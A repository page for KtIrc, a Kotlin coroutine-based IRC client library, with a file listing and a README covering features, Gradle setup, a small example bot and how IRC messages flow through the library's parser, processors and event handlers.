2. Data Center Connectivity: Businesses often deploy EPL to connect their data centers, enabling efficient data replication, backup, and disaster recovery processes.
3. Voice and Video Conferencing: EPL’s low latency and guaranteed bandwidth make it an excellent choice for supporting real-time communication applications, such as voice and video conferencing.
4. High-Speed Internet Access: Some businesses utilize EPL to establish high-speed, dedicated internet access, ensuring a consistent and reliable internet connection.
5. Private Cloud Connectivity: EPL can be used to connect to private cloud environments, facilitating secure access to cloud resources.
6. Content Distribution: Media and content providers may use EPL to distribute large volumes of data or media content between production facilities, content delivery centers, and distribution points.
7. Financial Services: Financial institutions often rely on EPL for secure and low-latency connectivity between their trading desks, data centers, and financial exchanges.
In summary, Ethernet Private Line (EPL) is a dedicated and symmetrical Ethernet service that provides a secure, reliable, and high-speed point-to-point connection between two locations. It is well-suited for businesses and organizations that require a private and predictable network link for various applications, including data transfer, real-time communication, and internet access. EPL’s guaranteed bandwidth, low latency, and high reliability make it an essential solution for supporting critical network connectivity needs.
|
__label__pos
| 0.962897 |
Stack Overflow is a community of 4.7 million programmers, just like you, helping each other.
Join them; it only takes a minute:
Sign up
Join the Stack Overflow community to:
1. Ask programming questions
2. Answer and help your peers
3. Get recognized for your expertise
How would I convert a string holding a number into its numeric value in Perl?
share|improve this question
1
Some of the answers are confusing because the question has been edited. The answer by porquero is best for this version of the question. – TimK Dec 7 '15 at 16:19
The question needs further detail. Is the string only composed of numerals? Alphanumeric? Ok if alphas are stripped? Is there a specific purpose for the resulting number? – JGurtz Mar 1 at 22:51
up vote 69 down vote accepted
You don't need to convert it at all:
% perl -e 'print "5.45" + 0.1;'
5.55
share|improve this answer
10
5.55 isn't an integer – OrangeDog Mar 7 '12 at 14:00
10
@OrangeDog the OP edited the question (some months after this answer was posted) - the original question actually had floating point numbers in it. – Alnitak Mar 14 '12 at 10:46
what about comparisons when the string has a comma in it? – Ramy May 22 '14 at 15:21
[rabdelaz@Linux_Desktop:~/workspace/akatest_5]$perl -e 'print "nope\n" unless "1,000" > 10;' nope [rabdelaz@Linux_Desktop:~/workspace/akatest_5]$perl -e 'print "nope\n" if "1,000" > 10;' – Ramy May 22 '14 at 15:24
This is a simple solution:
Example 1
my $var1 = "123abc";
print $var1 + 0;
Result
123
Example 2
my $var2 = "abc123";
print $var2 + 0;
Result
0
share|improve this answer
3
AFAIU this is the only answer to what was asked – Cougar May 10 '13 at 14:17
@Cougar: I agree. – Peter Mortensen May 7 '15 at 10:30
Perl is a context-based language. It doesn't do its work according to the data you give it. Instead, it figures out how to treat the data based on the operators you use and the context in which you use them. If you do numbers sorts of things, you get numbers:
# numeric addition with strings:
my $sum = '5.45' + '0.01'; # 5.46
If you do strings sorts of things, you get strings:
# string replication with numbers:
my $string = ( 45/2 ) x 4; # "22.522.522.522.5"
Perl mostly figures out what to do and it's mostly right. Another way of saying the same thing is that Perl cares more about the verbs than it does the nouns.
Are you trying to do something and it isn't working?
share|improve this answer
Forgive my lack of knowledge here but I don't quite get your second example. You're dividing two numbers, then multiplying them, how/why does this result in a string? – gideon Nov 28 '12 at 14:35
4
I'm not multiplying numbers. The x is the string replication operator. – brian d foy Jan 7 '13 at 9:12
1
oh I see. thanks! :) Perl sure has a lot of operators. – gideon Jan 7 '13 at 10:26
2
Shouldn't it be my $string = ( 45/2 ) x 3; # "22.522.522.5" with 45 instead of 44? Otherwise I don't get where the '.5's come from in the result... – Vickster Feb 27 '13 at 13:42
Google lead me here while searching on the same question phill asked (sorting floats) so I figured it would be worth posting the answer despite the thread being kind of old. I'm new to perl and am still getting my head wrapped around it but brian d foy's statement "Perl cares more about the verbs than it does the nouns." above really hits the nail on the head. You don't need to convert the strings to floats before applying the sort. You need to tell the sort to sort the values as numbers and not strings. i.e.
my @foo = ('1.2', '3.4', '2.1', '4.6');
my @foo_sort = sort {$a <=> $b} @foo;
See http://perldoc.perl.org/functions/sort.html for more details on sort
share|improve this answer
$var += 0
probably what you want. Be warned however, if $var is string could not be converted to numeric, you'll get the error, and $var will be reset to 0:
my $var = 'abc123';
print "var = $var\n";
$var += 0;
print "var = $var\n";
logs
var = abc123
Argument "abc123" isn't numeric in addition (+) at test.pl line 7.
var = 0
share|improve this answer
As I understand it int() is not intended as a 'cast' function for designating data type it's simply being (ab)used here to define the context as an arithmetic one. I've (ab)used (0+$val) in the past to ensure that $val is treated as a number.
share|improve this answer
Perl really only has three types: scalars, arrays, and hashes. And even that distinction is arguable. ;) The way each variable is treated depends on what you do with it:
% perl -e "print 5.4 . 3.4;"
5.43.4
% perl -e "print '5.4' + '3.4';"
8.8
share|improve this answer
4
Perl has many more types than, but for single values, it's just a single value. – brian d foy Nov 14 '08 at 3:02
2
you can also add 0 – Nathan Fellman Mar 31 '09 at 19:04
In comparisons it makes a difference if a scalar is a number of a string. And it is not always decidable. I can report a case where perl retrieved a float in "scientific" notation and used that same a few lines below in a comparison:
use strict;
....
next unless $line =~ /and your result is:\s*(.*)/;
my $val = $1;
if ($val < 0.001) {
print "this is small\n";
}
And here $val was not interpreted as numeric for e.g. "2e-77" retrieved from $line. Adding 0 (or 0.0 for good ole C programmers) helped.
share|improve this answer
Perl is weakly typed and context based. Many scalars can be treated both as strings and numbers, depending on the operators you use. $a = 7*6; $b = 7x6; print "$a $b\n";
You get 42 777777.
There is a subtle difference, however. When you read numeric data from a text file into a data structure, and then view it with Data::Dumper, you'll notice that your numbers are quoted. Perl treats them internally as strings.
Read:$my_hash{$1} = $2 if /(.+)=(.+)\n/;.
Dump:'foo' => '42'
If you want unquoted numbers in the dump:
Read:$my_hash{$1} = $2+0 if /(.+)=(.+)\n/;.
Dump:'foo' => 42
After $2+0 Perl notices that you've treated $2 as a number, because you used a numeric operator.
I noticed this whilst trying to compare two hashes with Data::Dumper.
share|improve this answer
protected by Community Jan 24 '13 at 20:17
Thank you for your interest in this question. Because it has attracted low-quality or spam answers that had to be removed, posting an answer now requires 10 reputation on this site.
Would you like to answer one of these unanswered questions instead?
Not the answer you're looking for? Browse other questions tagged or ask your own question.
|
__label__pos
| 0.663165 |
blue_heading_icons_calendar
Description
Session ID: 1613
Abstract:
With the release of the Oracle Mobile Cloud, Enterprise (OMCe) platform, customers now have the ability to enhance the user experience and provide connected relevant content instantly. Through modern mobile applications that are easier to create, and intelligent chatbots that provide a conversational interface, employees can escape the daily drag of navigating through a poor interface to try and find relevant content. Come to this session to hear more about how deploying a connected chatbot army can help your users get to the information they need to do their jobs effectively - across applications and business processes. This session will higlight a chatbot called Atlas, which is running on OMCe and provides a mechanism to connect to third party chatbots on other infrastructures and cloud platforms. This all brings togheter a much richer conversational journey for users across those platforms. Additionally come hear about the importance of a connected bot army with bots providing connected personalised information from Oracle Engagement Cloud, PeopleSoft HCM, Taleo and Content and Experience Cloud in a dynamic conversational flow.
Objective 1: 1. Understanding Interface vs Conversational flow User Experiences.
2. What are Chatbots, and how and where they can help an organisation.
3. Learn what types of bots are already in the market and how organisations are using them.
Objective 2: 1. A technical overview of chatbots, natural language processing, and artificial intelligence.
2. Steps to creating a good conversational flow.
3. How to integrate a chatbot and enhance its ability to personalise content with machine learning us
Objective 3: 1. Understand why you should create a bot army and not a single bot integrated to all required platforms and services?
2. Demo of Oracle Software Cloud exposed as a conversational flow.
3. Benefits of connecting to third-party chatbots.
Audience: Introductory
Tags
|
__label__pos
| 0.94256 |
Source code for errbot.bootstrap
from os import path, makedirs
import logging
import sys
import ast
from errbot.core import ErrBot
from errbot.plugin_manager import BotPluginManager
from errbot.repo_manager import BotRepoManager
from errbot.specific_plugin_manager import SpecificPluginManager
from errbot.storage.base import StoragePluginBase
from errbot.utils import PLUGINS_SUBDIR
from errbot.logs import format_logs
log = logging.getLogger(__name__)
HERE = path.dirname(path.abspath(__file__))
CORE_BACKENDS = path.join(HERE, 'backends')
CORE_STORAGE = path.join(HERE, 'storage')
PLUGIN_DEFAULT_INDEX = 'https://repos.errbot.io/repos.json'
[docs]def bot_config_defaults(config): if not hasattr(config, 'ACCESS_CONTROLS_DEFAULT'): config.ACCESS_CONTROLS_DEFAULT = {} if not hasattr(config, 'ACCESS_CONTROLS'): config.ACCESS_CONTROLS = {} if not hasattr(config, 'HIDE_RESTRICTED_COMMANDS'): config.HIDE_RESTRICTED_COMMANDS = False if not hasattr(config, 'HIDE_RESTRICTED_ACCESS'): config.HIDE_RESTRICTED_ACCESS = False if not hasattr(config, 'BOT_PREFIX_OPTIONAL_ON_CHAT'): config.BOT_PREFIX_OPTIONAL_ON_CHAT = False if not hasattr(config, 'BOT_PREFIX'): config.BOT_PREFIX = '!' if not hasattr(config, 'BOT_ALT_PREFIXES'): config.BOT_ALT_PREFIXES = () if not hasattr(config, 'BOT_ALT_PREFIX_SEPARATORS'): config.BOT_ALT_PREFIX_SEPARATORS = () if not hasattr(config, 'BOT_ALT_PREFIX_CASEINSENSITIVE'): config.BOT_ALT_PREFIX_CASEINSENSITIVE = False if not hasattr(config, 'DIVERT_TO_PRIVATE'): config.DIVERT_TO_PRIVATE = () if not hasattr(config, 'DIVERT_TO_THREAD'): config.DIVERT_TO_THREAD = () if not hasattr(config, 'MESSAGE_SIZE_LIMIT'): config.MESSAGE_SIZE_LIMIT = 10000 # Corresponds with what HipChat accepts if not hasattr(config, 'GROUPCHAT_NICK_PREFIXED'): config.GROUPCHAT_NICK_PREFIXED = False if not hasattr(config, 'AUTOINSTALL_DEPS'): config.AUTOINSTALL_DEPS = True if not hasattr(config, 'SUPPRESS_CMD_NOT_FOUND'): config.SUPPRESS_CMD_NOT_FOUND = False if not hasattr(config, 'BOT_ASYNC'): config.BOT_ASYNC = True if not hasattr(config, 'BOT_ASYNC_POOLSIZE'): config.BOT_ASYNC_POOLSIZE = 10 if not hasattr(config, 'CHATROOM_PRESENCE'): config.CHATROOM_PRESENCE = () if not hasattr(config, 'CHATROOM_RELAY'): config.CHATROOM_RELAY = () if not hasattr(config, 'REVERSE_CHATROOM_RELAY'): config.REVERSE_CHATROOM_RELAY = () if not hasattr(config, 'CHATROOM_FN'): config.CHATROOM_FN = 'Errbot' if not hasattr(config, 'TEXT_DEMO_MODE'): config.TEXT_DEMO_MODE = True if not hasattr(config, 'BOT_ADMINS'): raise ValueError('BOT_ADMINS missing from config.py.') if not hasattr(config, 'TEXT_COLOR_THEME'): config.TEXT_COLOR_THEME = 'light' if not hasattr(config, 'BOT_ADMINS_NOTIFICATIONS'): config.BOT_ADMINS_NOTIFICATIONS = config.BOT_ADMINS
[docs]def setup_bot(backend_name, logger, config, restore=None): # from here the environment is supposed to be set (daemon / non daemon, # config.py in the python path ) bot_config_defaults(config) format_logs(config.TEXT_COLOR_THEME) if config.BOT_LOG_FILE: hdlr = logging.FileHandler(config.BOT_LOG_FILE) hdlr.setFormatter(logging.Formatter("%(asctime)s %(levelname)-8s %(name)-25s %(message)s")) logger.addHandler(hdlr) if hasattr(config, 'BOT_LOG_SENTRY') and config.BOT_LOG_SENTRY: try: from raven.handlers.logging import SentryHandler except ImportError: log.exception( "You have BOT_LOG_SENTRY enabled, but I couldn't import modules " "needed for Sentry integration. Did you install raven? " "(See http://raven.readthedocs.org/en/latest/install/index.html " "for installation instructions)" ) exit(-1) sentryhandler = SentryHandler(config.SENTRY_DSN, level=config.SENTRY_LOGLEVEL) logger.addHandler(sentryhandler) logger.setLevel(config.BOT_LOG_LEVEL) storage_plugin = get_storage_plugin(config) # init the botplugin manager botplugins_dir = path.join(config.BOT_DATA_DIR, PLUGINS_SUBDIR) if not path.exists(botplugins_dir): makedirs(botplugins_dir, mode=0o755) plugin_indexes = getattr(config, 'BOT_PLUGIN_INDEXES', (PLUGIN_DEFAULT_INDEX,)) if isinstance(plugin_indexes, str): plugin_indexes = (plugin_indexes, ) repo_manager = BotRepoManager(storage_plugin, botplugins_dir, plugin_indexes) botpm = BotPluginManager(storage_plugin, repo_manager, config.BOT_EXTRA_PLUGIN_DIR, config.AUTOINSTALL_DEPS, getattr(config, 'CORE_PLUGINS', None), getattr(config, 'PLUGINS_CALLBACK_ORDER', (None, ))) # init the backend manager & the bot backendpm = bpm_from_config(config) backend_plug = backendpm.get_candidate(backend_name) log.info("Found Backend plugin: '%s'\n\t\t\t\t\t\tDescription: %s" % (backend_plug.name, backend_plug.description)) try: bot = backendpm.get_plugin_by_name(backend_name) bot.attach_storage_plugin(storage_plugin) bot.attach_repo_manager(repo_manager) bot.attach_plugin_manager(botpm) bot.initialize_backend_storage() except Exception: log.exception("Unable to load or configure the backend.") exit(-1) # restore the bot from the restore script if restore: # Prepare the context for the restore script if 'repos' in bot: log.fatal('You cannot restore onto a non empty bot.') sys.exit(-1) log.info('**** RESTORING the bot from %s' % restore) with open(restore) as f: ast.literal_eval(f.read()) bot.close_storage() print('Restore complete. You can restart the bot normally') sys.exit(0) errors = bot.plugin_manager.update_dynamic_plugins() if errors: log.error('Some plugins failed to load:\n' + '\n'.join(errors.values())) bot._plugin_errors_during_startup = "\n".join(errors.values()) return bot
[docs]def get_storage_plugin(config): """ Find and load the storage plugin :param config: the bot configuration. :return: the storage plugin """ storage_name = getattr(config, 'STORAGE', 'Shelf') extra_storage_plugins_dir = getattr(config, 'BOT_EXTRA_STORAGE_PLUGINS_DIR', None) spm = SpecificPluginManager(config, 'storage', StoragePluginBase, CORE_STORAGE, extra_storage_plugins_dir) storage_pluginfo = spm.get_candidate(storage_name) log.info("Found Storage plugin: '%s'\nDescription: %s" % (storage_pluginfo.name, storage_pluginfo.description)) storage_plugin = spm.get_plugin_by_name(storage_name) return storage_plugin
[docs]def bpm_from_config(config): """Creates a backend plugin manager from a given config.""" extra = getattr(config, 'BOT_EXTRA_BACKEND_DIR', []) return SpecificPluginManager( config, 'backends', ErrBot, CORE_BACKENDS, extra_search_dirs=extra )
[docs]def enumerate_backends(config): """ Returns all the backends found for the given config. """ bpm = bpm_from_config(config) return [plug.name for (_, _, plug) in bpm.getPluginCandidates()]
[docs]def bootstrap(bot_class, logger, config, restore=None): """ Main starting point of Errbot. :param bot_class: The backend class inheriting from Errbot you want to start. :param logger: The logger you want to use. :param config: The config.py module. :param restore: Start Errbot in restore mode (from a backup). """ bot = setup_bot(bot_class, logger, config, restore) log.debug('Start serving commands from the %s backend' % bot.mode) bot.serve_forever()
|
__label__pos
| 0.935047 |
whether it can communication which S series switches as a gateway, downlink the host subnet mask than its subnet mask longer(larger)
33
S series switches (except S1700) as a gateway, the host of downlink subnet mask than its subnet mask loger(larger), the situation of communication between the host as follows:
1) HostS are located on the same network segment of the same VLAN, can communicate normally;
2) Hosts are located on the same network segment with different VLANs, it can be communication with each other by configure the ARP proxy inside VLAN .
3) Hosts belong to different network segments with the sanme VLAN, it can be communication between hosts by configure VLANIF
4) Hosts belong to different network segments and different VLANs, it can be communication between hosts by configure VLAN aggregation
Other related questions:
USG2000 initial settings and subnet mask allocation
The subnet mask of the USG2000 specifies the bits, in the IP address, used for the network or subnet ID as well as for the host ID. The AND operation is performed for the corresponding bits of the 32-bit IP address and the subnet mask, to determine the network ID corresponding to the IP address. Assume that the IP address is 10.1.1.2 and the subnet mask is 255.255.0.0. The result of the AND operation performed for the corresponding bits of the IP address and the subnet mask, that is, 10.1.0.0, is the network address.
How to change an interface IP address on an S series switches
You can delete or change an interface IP address on an S series switches (except the S1700) as follows: - To delete the IP address of an interface, run the undo ip address [ ip-address { mask | mask-length } ] command in the interface view. For example: [HUAWEI] interface Vlanif 100 [HUAWEI-Vlanif100] display this # interface Vlanif100 ip address 10.1.1.1 255.255.255.0 # [HUAWEI-Vlanif100] undo ip address [HUAWEI-Vlanif100] display this # interface Vlanif100 # - To change the IP address or subnet mask of an interface, run the ip address ip-address { mask | mask-length } command in the interface view. For example: [HUAWEI] interface Vlanif 100 [HUAWEI-Vlanif100] display this # interface Vlanif100 ip address 10.1.1.1 255.255.255.0 # [HUAWEI-Vlanif100] ip address 10.2.1.1 255.255.0.0 [HUAWEI-Vlanif100] display this # interface Vlanif100 ip address 10.2.1.1 255.255.0.0 #
S series switch subnet network address if can be used as host address
S series switches (except S1700) network address of the subnet can not be the host address. If the host address is configured, an error message will appear:Error:The specified IP address is invalid.
A fault occurs on an S series switch when the network IP address/mask and host IP address/mask are configured. Why
Question: Why a fault occurs when I configure the network IP address/mask and host IP address/mask? Answer: You may solve the problem as follows: Ensure that the host is a part of the same network and the mask is correct. Ensure that the IP address and mask of the host can be combined to a network IP address. Ensure that the IP address of the host is unique on the network. Ensure that the IP address of the network is unique in the area.
If you have more questions, you can seek help from following ways:
To iKnow To Live Chat
Scroll to top
|
__label__pos
| 0.97622 |
Tony Power Tony Power - 1 year ago 57
Python Question
Python: Comparing empty string to False is False, why?
If
not ''
evaluates to
True
, why does
'' == False
evaluates to
False
?
For example, the "voids" of the other types (e.g. 0, 0.0) will return
True
when compared to
False
:
>>> 0 == False
True
>>> 0.0 == False
True
Thanks
Answer Source
In the context of Boolean operations, and also when expressions are used by control flow statements, the following values are interpreted as false: False, None, numeric zero of all types, and empty strings and containers (including strings, tuples, lists, dictionaries, sets and frozensets). All other values are interpreted as true. User-defined objects can customize their truth value by providing a __bool__() method.
The operator not yields True if its argument is false, False otherwise.
https://docs.python.org/3/reference/expressions.html#comparisons
But:
The operators <, >, ==, >=, <=, and != compare the values of two objects. The objects do not need to have the same type.
...
Because all types are (direct or indirect) subtypes of object, they inherit the default comparison behavior from object. Types can customize their comparison behavior by implementing rich comparison methods like __lt__() ...
https://docs.python.org/3/reference/expressions.html#boolean-operations
So, the technical implementation answer is that it behaves the way it does because not and == use different comparisons. not uses __bool__, the "truth value" of an object, while == uses __eq__, the direct comparison of one object to another. So it's possible to ask an object whether it considers itself to be truthy or falsey, and separately from that ask it whether it considers itself to be equal to another object or not. The default implementations for that are arranged in a way that two objects can both consider themselves falsey yet not consider themselves equal to one another.
|
__label__pos
| 0.990631 |
Files generated during replay
This section describes what occurs when a Vuser script is replayed, and describes the files that are created.
1. The options.txt file is created. This file includes command line parameters to the preprocessor.
Example of options.txt file
-DCCI
-D_IDA_XL
-DWINNT
-Ic:\tmp\Vuser (name and location of Vuser include files)
-IE:\LRUN45B2\include (name and location of include files)
-ec:\tmp\Vuser\logfile.log (name and location of output logfile)
c:\tmp\Vuser\VUSER.c (name and location of file to be processed)
2. The file Vuser.c is created. This file contains 'includes' to all the relevant .c and .h files.
Example of Vuser.c file
#include "E:\LRUN45B2\include\lrun.h"
#include "c:\tmp\web\init.c"
#include "c:\tmp\web\run.c"
#include "c:\tmp\web\end.c"
3. The c preprocessor cpp.exe is invoked in order to 'fill in' any macro definitions, precompiler directives, and so on, from the development files.
The following command line is used:
cpp -foptions.txt
4. The file pre_cci.c is created which is also a C file (pre_cci.c is defined in the options.txt file). The file logfile.log (also defined in options.txt) is created containing any output of this process. This file should be empty if there are no problems with the preprocessing stage. If the file is not empty then it is almost certain that the next stage of compilation will fail due to a fatal error.
5. The cci.exe C compiler is now invoked to create a platform-dependent pseudo-binary file (.ci) to be used by the Vuser driver program that will interpret it at runtime. The cci takes the pre_cci.c file as input.
6. The file pre_cci.ci is created as follows:
cci -errout c:\tmp\Vuser\logfile.log -c pre_cci.
7. The file logfile.log is the log file containing output of the compilation.
8. The file pre_cci.ci is now renamed to Vuser.ci.
Since the compilation can contain both warnings and errors, and since the driver does not know the results of this process, the driver first checks if there are entries in the logfile.log file. If there are, it then checks if the file Vuser.ci has been built. If the file size is not zero, it means that the cci has succeeded to compile - if not, then the compilation has failed and an error message will be given.
9. The relevant driver is now run, taking both the .usr file and the Vuser.ci file as input. For example:
mdrv.exe -usr c:\tmp\Vuser\.usr -out c:\tmp\Vuser -file c:\tmp\Vuser\Vuser.ci
The .usr file is needed since it tells the driver program which database is being used. This determines which libraries need to be loaded for the run.
10. If there is an existing replay log file, output.txt, (see the following entry), the log file is copied to output.bak.
11. The output.txt file is created (in the path defined by the 'out' variable). This file contains the output messages that were generated during the script replay. These are the same messages that appear in the Replay view of VuGen's Output pane.
Back to top
|
__label__pos
| 0.977839 |
Powershell; Folder Report with File Count and Size
I was recently asked what tool would be best to report the number of items in, and the size of, every folder in a particular file share. As an IT Architect I have numerous tools at my disposal that would be able to acquire the data my business partner needed. A few lines of PowerShell was the easiest to implement.
If you’ve used PowerShell for long you already known that Get-ChildItem is the cmdlet to retrieve things under a parent. Files, Folders, Items, you can list them all with GCI. Open PowerShell and type GCI then press enter, depending on your PowerShell profile settings, you should see a list of all your user profile sub folders. This cmdlet will form the basis of our report script.
gci
Of course, the full solution is a little more complicated than that. To generate a useful report we’ll use the Get-ChildItem command to get a list of folders in our path. Then we’ll loop through each folder with the same command again to get a list of the files.
We’ll build an array that contains the count and length (size) properties of each file. Finally we’ll export that array to a csv file in your documents folder. With a little more effort you could generate an HTML report and upload it to a web page or embed it in an email. See some of my other articles for how.
# Get-FileReport.ps1
#Author: Kevin Trent, Whatdouknow.com
#Right click .ps1 file and Open with PowerShell
#Enter Filepath or share path.
$location = Read-Host "Enter Top Level File Path"
$folders = Get-ChildItem -Path $location -Recurse -Directory
$array = @()
foreach ($folder in $folders)
{
$foldername = $folder.FullName
# Find files in sub-folders
$files = Get-ChildItem $foldername -Attributes !Directory
# Calculate size in MB for files
$size = $Null
$files | ForEach-Object -Process {
$size += $_.Length
}
$sizeinmb = [math]::Round(($size / 1mb), 1)
# Add pscustomobjects to array
$array += [pscustomobject]@{
Folder = $foldername
Count = $files.count
'Size(MB)' = $sizeinmb
}
}
# Generate Report Results in your Documents Folder
$array|Export-Csv -Path $env:USERPROFILE\documents\file_report.csv -NoTypeInformation
12 Comments
1. Hi,
Nice script but i have an error :
Get-ChildItem : The specified path, file name, or both are too long. The fully qualified file name must be less than 260 characters, and the directory name
must be less than 248 characters.
Like
1. That isn’t an error caused by the script. Somewhere on the system you ran it on is a file(s) that is violating the Max_Path system variable. One of the easiest ways to deal with it is to move the files into a shorter folder structure. There are also several utility apps out there that can help you.
Like
1. Yes it’s a windows limitation…
But i have seen scripts that avoid the error by using the robotcopy command in their script…
Like
2. Hi Kevin,
Great post and a great script that has helped me, however some sub-folders (in fact a lot) in the directories I run this against are empty.
Is there a way to not write empty (0 files) folders to the CSV log file?
I guess on the flipside to help other people, is also the opposite and to only report empty folders.
Thanks Darren
Like
1. My apologies, I just noticed that WordPress did not publish my reply to you. The answer is yes but not by modifying the export itself. Export-CSV assumes that you have everything the way you want it before you invoke the command. Swap out the section below and the new If statement will filter out 0 MB items except when they are the parent folder of something populated.
# Add pscustomobjects to array
If ($sizeinmb -ne 0) {
$array += [pscustomobject]@{
Folder = $foldername
Count = $files.count
‘Size(MB)’ = $sizeinmb}
}
}
Like
3. Wow, a great script, and so cleverly presented that even a noob can make sense of it; great potential for learning (should one be teachable).
I am puzzled by the output: my result is a single line for each of the top-level folders in the target directory (appropriate file and file size numbers) but although the script calls for -Recurse, no child folders are reported. What am I missing?
Thanks in advance for any hints and suggestions!
Like
4. Nice teaching presentation, and a bit more robust than most folder, file count scripts.
I have a problem with the output failing to include subfolders’ files. I’ve read of ‘-Recurse’ wrecking the output when collecting both directory and file information (and being a total noob, am hesitant to experiment with your code!) Was this expected to return values for folders and subfolders (some of the folders contain only folders—no my design!), or have I expected some magic the script isn’t designed to provide?
Like
5. Hi Kevin
Is it possible to update a script to provide Modified Date, Date Created, Item type folder, security permissions at the folder level
Like
6. HI Kevin,
Great script. Is it possible to update a script to provide below fields
Modified Date , Date Created, Item type folder, security permissions at the folder level (including nested folders)
Like
Leave a Reply
Fill in your details below or click an icon to log in:
WordPress.com Logo
You are commenting using your WordPress.com account. Log Out / Change )
Twitter picture
You are commenting using your Twitter account. Log Out / Change )
Facebook photo
You are commenting using your Facebook account. Log Out / Change )
Connecting to %s
|
__label__pos
| 0.572563 |
summaryrefslogtreecommitdiffstats
path: root/drivers/usb/storage/transport.c
blob: 4140991340c67f1472a40bc5cf463f9bb7b38719 (plain)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
/*
* Most of this source has been derived from the Linux and
* U-Boot USB Mass Storage driver implementations.
*
* Adapted for barebox:
* Copyright (c) 2011, AMK Drives & Controls Ltd.
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License as
* published by the Free Software Foundation; either version 2 of
* the License, or (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
*
*/
#include <common.h>
#include <clock.h>
#include <scsi.h>
#include <errno.h>
#include <dma.h>
#undef USB_STOR_DEBUG
#include "usb.h"
#include "transport.h"
/* The timeout argument of usb_bulk_msg() is actually ignored
and the timeout is hardcoded in the host driver */
#define USB_BULK_TO 5000
static __u32 cbw_tag = 0;
/* direction table -- this indicates the direction of the data
* transfer for each command code (bit-encoded) -- 1 indicates input
* note that this doesn't work for shared command codes
*/
static const unsigned char us_direction[256/8] = {
0x28, 0x81, 0x14, 0x14, 0x20, 0x01, 0x90, 0x77,
0x0C, 0x20, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00,
0x00, 0x01, 0x00, 0x40, 0x09, 0x01, 0x80, 0x01,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
};
#define US_DIRECTION(x) ((us_direction[x>>3] >> (x & 7)) & 1)
/*
* Bulk only transport
*/
/* Clear a stall on an endpoint - special for bulk-only devices */
static int usb_stor_Bulk_clear_endpt_stall(struct us_data *us, unsigned int pipe)
{
return usb_clear_halt(us->pusb_dev, pipe);
}
/* Determine what the maximum LUN supported is */
int usb_stor_Bulk_max_lun(struct us_data *us)
{
int len, ret = 0;
unsigned char *iobuf = dma_alloc(1);
/* issue the command */
iobuf[0] = 0;
len = usb_control_msg(us->pusb_dev,
usb_rcvctrlpipe(us->pusb_dev, 0),
US_BULK_GET_MAX_LUN,
USB_DIR_IN | USB_TYPE_CLASS | USB_RECIP_INTERFACE,
0, us->ifnum, iobuf, 1, USB_CNTL_TIMEOUT);
US_DEBUGP("GetMaxLUN command result is %d, data is %d\n",
len, (int)iobuf[0]);
/* if we have a successful request, return the result */
if (len > 0)
ret = iobuf[0];
dma_free(iobuf);
/*
* Some devices don't like GetMaxLUN. They may STALL the control
* pipe, they may return a zero-length result, they may do nothing at
* all and timeout, or they may fail in even more bizarrely creative
* ways. In these cases the best approach is to use the default
* value: only one LUN.
*/
return ret;
}
int usb_stor_Bulk_transport(ccb *srb, struct us_data *us)
{
struct bulk_cb_wrap cbw;
struct bulk_cs_wrap csw;
int actlen, data_actlen;
int result;
unsigned int residue;
unsigned int pipein = usb_rcvbulkpipe(us->pusb_dev, us->recv_bulk_ep);
unsigned int pipeout = usb_sndbulkpipe(us->pusb_dev, us->send_bulk_ep);
int dir_in = US_DIRECTION(srb->cmd[0]);
srb->trans_bytes = 0;
/* set up the command wrapper */
cbw.Signature = cpu_to_le32(US_BULK_CB_SIGN);
cbw.DataTransferLength = cpu_to_le32(srb->datalen);
cbw.Flags = (dir_in ? US_BULK_FLAG_IN : US_BULK_FLAG_OUT);
cbw.Tag = ++cbw_tag;
cbw.Lun = srb->lun;
cbw.Length = srb->cmdlen;
/* copy the command payload */
memcpy(cbw.CDB, srb->cmd, cbw.Length);
/* send it to out endpoint */
US_DEBUGP("Bulk Command S 0x%x T 0x%x L %d F %d Trg %d LUN %d CL %d\n",
le32_to_cpu(cbw.Signature), cbw.Tag,
le32_to_cpu(cbw.DataTransferLength), cbw.Flags,
(cbw.Lun >> 4), (cbw.Lun & 0x0F),
cbw.Length);
result = usb_bulk_msg(us->pusb_dev, pipeout, &cbw, US_BULK_CB_WRAP_LEN,
&actlen, USB_BULK_TO);
US_DEBUGP("Bulk command transfer result=%d\n", result);
if (result < 0) {
usb_stor_Bulk_reset(us);
return USB_STOR_TRANSPORT_FAILED;
}
/* DATA STAGE */
/* send/receive data payload, if there is any */
mdelay(1);
data_actlen = 0;
if (srb->datalen) {
unsigned int pipe = dir_in ? pipein : pipeout;
result = usb_bulk_msg(us->pusb_dev, pipe, srb->pdata,
srb->datalen, &data_actlen, USB_BULK_TO);
US_DEBUGP("Bulk data transfer result 0x%x\n", result);
/* special handling of STALL in DATA phase */
if ((result < 0) && (us->pusb_dev->status & USB_ST_STALLED)) {
US_DEBUGP("DATA: stall\n");
/* clear the STALL on the endpoint */
result = usb_stor_Bulk_clear_endpt_stall(us, pipe);
}
if (result < 0) {
US_DEBUGP("Device status: %lx\n", us->pusb_dev->status);
usb_stor_Bulk_reset(us);
return USB_STOR_TRANSPORT_FAILED;
}
}
/* STATUS phase + error handling */
US_DEBUGP("Attempting to get CSW...\n");
result = usb_bulk_msg(us->pusb_dev, pipein, &csw, US_BULK_CS_WRAP_LEN,
&actlen, USB_BULK_TO);
/* did the endpoint stall? */
